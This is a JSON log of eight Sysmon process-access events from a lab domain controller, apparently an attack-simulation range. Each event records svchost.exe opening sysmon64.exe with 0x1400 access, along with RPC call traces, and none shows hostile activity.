{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1546,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1547,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1548,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1549,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1550,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1551,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1552,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1553,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
